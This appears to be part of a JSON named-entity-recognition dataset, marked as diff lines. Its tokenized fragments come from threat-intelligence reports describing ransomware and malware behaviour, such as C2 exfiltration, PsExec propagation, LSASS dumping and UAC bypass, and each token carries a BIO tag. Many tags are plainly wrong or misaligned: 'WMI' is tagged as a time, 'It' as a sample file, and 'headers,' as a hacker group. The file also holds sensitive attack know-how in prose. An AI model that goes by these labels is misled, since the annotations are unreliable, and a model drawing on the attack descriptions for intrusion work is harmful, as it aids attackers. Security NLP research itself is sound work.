- "and", - "IDs." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerate", - "running", - "processes", - "and", - "send", - "a", - "list", - "of", - "process", - "names", - "and", - "IDs", - "back", - "to", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Enumerates", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "loader", - "allocates", - "memory", - "within", - "the", - "current", - "process", - "and", - "then", - "loads", - "the", - "PE", - "payload", - "into", - "it", - "using", - "the", - "full", - "PE", - "loading", - "procedure." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "copies", - "the", - "headers,", - "maps", - "the", - "individual", - "PE", - "sections,", - "processes", - "any", - "relocations,", - "loads", - "the", - "PE’s", - "imports,", - "and", - "then", - "executes", - "the", - "PE", - "from", - "its", - "internally", - "specified", - "entry", - "point." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "the", - "PE", - "payload", - "to", - "it,", - "which", - "the", - "shellcode", - "then", - "loads", - "and", - "executes." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Enumerate", - "files", - "on", - "desktop" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Enumerates", - "files", - "under", - "Steam", - "application", - "directory" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "looping", - "through", - "entries", - "under", - "registry", - "key" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "waits", - "for", - "data", - "collection", - "tasks", - "to", - "complete," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "hash", - "of", - "the", - "collected", - "data,", - "to", - "which", - "it", - "then", - "appends", - "its", - "current", - "process", - "id." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uploads", - "data", - "to", - "the", - "C2", - "via", - "a", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "http/https", - "data", - "transfer" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Self-delete", - "after", - "sending", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "then", - "attempts", - "to", - "connect", - "to", - "the", - "C2", - "via", - "TCP", - "port", - "443" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ranswomare", - "for", - "Windows", - "can", - "self-propagate", - "in", - "the", - "local", - "area", - "network", - "using", - "the", - "legitimate", - "PsExec", - "utility", - "(contained", - "in", - "its", - "body),", - "which", - "creates", - "a", - "temporary", - "system", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Legitimate", - "accounts", - "obtained", - "by", - "the", - "attackers", - "can", - "be", - "used", - "to", - "ensure", - "persistence", - "in", - "the", - "compromised", - "infrastructure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "may", - "use", - "stolen", - "legitimate", - "accounts", - "specified", - "in", - "the", - "configuration", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "command", - "shell", - "to", - "run", - "appropriate", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "additional", - "BAT", - "file", - "contained", - "in", - "the", - "body", - "of", - "the", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "attackers", - "may", - "use", - "wmic", - "to", - "obtain", - "information", - "and", - "run", - "various", - "commands," - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "They", - "may", - "also", - "use", - "the", - "wmiexec", - "module", - "from", - "Impacket", - "to", - "execute", - "commands", - "and", - "move", - "across", - "the", - "network." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "wmic", - "to", - "obtain", - "the" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ransomware", - "uses", - "Native", - "API." - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "the", - "function", - "CreateProcessWithLogonW." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "affiliates", - "may", - "exploit", - "group", - "policies,", - "which", - "results", - "in", - "a", - "scheduled", - "task", - "being", - "created", - "(on", - "each", - "host)", - "that", - "launches", - "the", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "disabling", - "security", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "prevent", - "being", - "detected,", - "the", - "attackers", - "end", - "processes", - "and", - "services", - "related", - "to", - "security", - "and", - "antivirus", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "bypass", - "UAC,", - "BlackCat", - "ransomware", - "may", - "escalate", - "privileges", - "using", - "the", - "ICMLuaUtil", - "COM", - "interface,", - "as", - "well", - "as", - "use", - "the", - "Masquerade", - "PEB", - "method." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Bypass", - "User", - "Account", - "Control;The", - "attackers", - "may", - "bypass", - "UAC", - "using", - "the", - "ICMLuaUtil", - "COM", - "interface,", - "as", - "well", - "as", - "use", - "the", - "Masquerade", - "PEB", - "method." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "configuration", - "data", - "as", - "well", - "as", - "decrypts", - "and", - "unpacks", - "the", - "legitimate", - "PsExec", - "utility" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "the", - "legitimate", - "PsExec", - "utility" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ransomware", - "uses", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "a", - "SoftPerfect", - "Network", - "Scanner", - "executable", - "renamed", - "to", - "svchost.exe." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "uses", - "PsExec", - "to", - "modify", - "the", - "system", - "registry", - "parameter", - "MaxMpxCt" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "obtain", - "authentication", - "data,", - "the", - "attackers", - "may", - "dump", - "the", - "LSASS", - "process", - "using", - "legitimate", - "tools", - "(procdump,", - "comsvcs.dll)." - ], - "ner_tags": [ - "O", - "O", - "B-Purp", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "To", - "obtain", - "authentication", - "data", - "from", - "the", - "registry", - "and", - "files,", - "the", - "attackers", - "may", - "use", - "NirSoft", - "utilities." - ], - "ner_tags": [ - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "attackers", - "enumerate", - "drives,", - "directories,", - "and", - "files" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "search", - "for", - "sensitive", - "information", - "for", - "exfiltration", - "purposes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "attackers", - "collect", - "information", - "from", - "the", - "local", - "system", - "for", - "exfiltration", - "purposes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Purp" - ] - }, - { - "tokens": [ - "The", - "attackers", - "may", - "use", - "RDP", - "to", - "move", - "across", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "uses", - "wmic", - "to", - "obtain", - "the", - "UUID", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "all", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ";Moving", - "across", - "the", - "victim’s", - "network", - "and", - "deploying", - "ransomware", - "involves", - "copying", - "related", - "tools", - "to", - "the", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "self-propagate", - "in", - "the", - "network", - "by", - "using", - "the", - "legitimate", - "PsExec", - "utility" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "to", - "search", - "for", - "ones", - "relating", - "to", - "security" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "system", - "services", - "to", - "search", - "for", - "ones", - "relating", - "to", - "security" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "exfiltration,", - "the", - "attackers", - "may", - "put", - "collected", - "data", - "in", - "7Zip", - "archives." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remote", - "access", - "tools", - "used", - "by", - "the", - "attackers", - "may", - "use", - "application", - "layer", - "protocols", - "(HTTP,", - "HTTPS," - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "When", - "the", - "attackers", - "use", - "Cobalt", - "Strike,", - "the", - "collected", - "information", - "may", - "be", - "sent", - "via", - "Cobalt", - "Strike", - "server", - "communication", - "channels." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "remotely", - "access", - "the", - "compromised", - "infrastructure,", - "the", - "attackers", - "may", - "use", - "the", - "legitimate", - "tools", - "TeamViewer", - "and", - "ScreenConnect." - ], - "ner_tags": [ - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "To", - "remotely", - "access", - "the", - "compromised", - "infrastructure,", - "the", - "attackers", - "may", - "use", - "Cobalt", - "Strike,", - "TeamViewer", - "and", - "ScreenConnect" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "which", - "perform", - "asymmetric/symmetric", - "encryption", - "of", - "the", - "C&C", - "server", - "communication", - "channel." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attackers", - "copy", - "tools", - "necessary", - "for", - "deployment", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "executes", - "a", - "command", - "to", - "delete", - "itself", - "from", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "key", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attackers", - "have", - "been", - "seen", - "using", - "several", - "methods", - "to", - "distribute", - "the", - "wiper", - "through", - "the", - "domain,", - "like:", - "domain", - "Group", - "Policy", - "Object", - "(GPO)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "installs", - "the", - "payload", - "as", - "a", - "service" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sets", - "a", - "hardcoded", - "list", - "of", - "system", - "directories" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "system", - "directories", - "are", - "targeted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "their", - "partitions." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "obfuscated", - ".NET", - "program." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "WMI" - ], - "ner_tags": [ - "B-Time" - ] - }, - { - "tokens": [ - "to", - "identify", - "where", - "the", - "Operative", - "System", - "is", - "stored", - "in", - "the", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Application-level", - "protocol" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "the", - "output", - "of", - "ipconfig", - "in", - "a", - "POST", - "request" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "opening", - "of", - "a", - "URL", - "file", - "extracted", - "from", - "the", - "archive." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "output", - "of", - "ipconfig", - "was", - "sent", - "to", - "one", - "of", - "two", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Application-level", - "protocol" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "GET", - "request", - "is", - "sent", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "application-level", - "messages", - "from", - "the", - "server", - "to", - "the", - "client", - "is", - "sent", - "as", - "the", - "body", - "of", - "an", - "HTTP", - "response" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "are", - "sent", - "using", - "separate", - "POST", - "requests." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "an", - "HTTPS", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "same", - "IP", - "address", - "was", - "used", - "as", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domains", - "give", - "attackers", - "the", - "ability", - "to", - "mask", - "malicious", - "traffic", - "as", - "legitimate", - "activity", - "within", - "the", - "company" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HttpConnector", - "and", - "HttpBindConnector", - "are", - "HTTP", - "client", - "with", - "support", - "for", - "proxy", - "and", - "HTTP", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "and", - "HTTPS", - "are", - "supported" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "with", - "long", - "polling" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "connect", - "by", - "sending", - "a", - "GET", - "request", - "to", - "a", - "URL", - "from", - "the", - "configuration", - "and", - "provide", - "a", - "special", - "cookie", - "value" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "GET", - "requests", - "with", - "pull", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POST", - "request", - "with", - "push", - "operation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Application-level", - "protocol" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "HTTP/HTTPS", - "for", - "C2", - "connections" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "encrypted", - "resume" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "archive" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "archive", - "contains", - "a", - "bait", - "PDF", - "document" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XOR", - "encrypted", - "with", - "a", - "16-byte", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "VMProtect" - ], - "ner_tags": [ - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "additional", - "XOR", - "encryption", - "with", - "the", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AES-128-CBC", - "for", - "encryption." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "hashed", - "with", - "MD5" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "AES-128", - "in", - "CFB", - "mode", - "as", - "the", - "encryption", - "algorithm" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "the", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "RAR", - "archive" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "distributed", - "in", - "a", - "RAR", - "archive" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ROR-13", - "hash" - ], - "ner_tags": [ - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "re-encrypted", - "and", - "saved", - "in", - "the", - "same", - "location" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "header" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "Base64", - "string", - "containing", - "the", - "session", - "GUID" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compressed", - "with", - "GZip", - "prior", - "to", - "encryption" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "are", - "obfuscated", - "with", - "VMProtect" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "obfuscated" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "code" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "encrypted", - "in", - "the", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "re-encrypted" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "been", - "obfuscated", - "with", - "the", - "same", - "rel_jmp", - "and", - "fake-jb", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SFX", - "archive" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "SFX", - "archive" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "RAR", - "and", - "SFX-RAR", - "files" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "plus", - "the", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "archive," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "located", - "in", - "the", - "data", - "sections" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "is", - "located", - "in", - "a", - "PE", - "file", - "overlay." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "(encrypted)", - "shellcode" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "consists", - "of", - "two", - ".exe", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "contains", - "three", - "identical", - "executable", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "just", - "one", - "file:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "also", - "embedded", - "inside", - "the", - "CHM", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "three", - "sections", - "are", - "extracted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "shortcuts" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Web", - "lnks", - "with", - "two", - "shortcuts:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "copies", - "the", - "payload", - "to", - "the", - "folder", - "C:\\Users\\Public\\Downloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PDF", - "documents", - "with", - "a", - "CV", - "and", - "IELTS", - "certificate" - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "folder", - "C:\\Users\\Public" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "copied", - "to", - "the", - "folder", - "%appdata%\\Microsoft\\AddIns\\" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "into", - "the", - "folder", - "c:\\programdata" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "folder", - "c:\\programdata" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "trying", - "to", - "open", - "either", - "of", - "the", - "shortcuts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "user", - "opens", - "it", - "directly" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "tries", - "to", - "make", - "users", - "run", - "malicious", - ".lnk,", - ".chm,", - "and", - ".exe", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "running", - "a", - "command", - "that", - "extracts", - "a", - "Base64-encoded", - "CAB", - "archive", - "from", - "the", - "body", - "of", - "the", - "LNK", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "archive", - "is", - "unpacked", - "to", - "a", - "temporary", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "extracted", - "JS", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extract", - "shellcode" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "string" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "for", - "decryption:" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "unpacked" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "encrypted", - "portion", - "of", - "the", - "data", - "is", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "decrypted" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decryption", - "and", - "decompression" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decodes", - "it", - "into", - "shellcode", - "with", - "Base64" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "custom", - "PL", - "format", - "with", - "encryption" - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adding", - "itself", - "to", - "the", - "startup", - "folder" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writes", - "the", - "file", - "svchost.bat,", - "which", - "transfers", - "control", - "to", - "winness.exe,", - "to", - "the", - "startup", - "folder" - ], - "ner_tags": [ - "O", - "O", 